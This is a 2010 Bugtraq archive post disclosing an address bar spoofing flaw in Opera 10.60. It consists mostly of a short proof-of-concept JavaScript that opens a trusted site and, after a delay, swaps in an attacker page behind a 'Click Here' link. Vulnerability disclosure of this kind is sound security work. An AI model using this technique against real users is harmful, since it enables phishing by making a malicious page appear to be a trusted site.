Bugtraq mailing list archives
Opera Browser Address Bar Spoofing Vulnerability
From: info () securitylab ir
Date: Wed, 14 Jul 2010 23:34:29 -0600
Spoofing Code: <script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','new') pause (3000) win = window.open('http://www.evilsite.com','new') } </script> <a href="javascript: Spoofing()">Click Here</a> ######################################################################## Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com) Tested on Opera 10.60 Original Advisory: http://pouya.info/blog/userfiles/pdf/Opera-ABS.pdf
Current thread:
- Opera Browser Address Bar Spoofing Vulnerability info (Jul 15)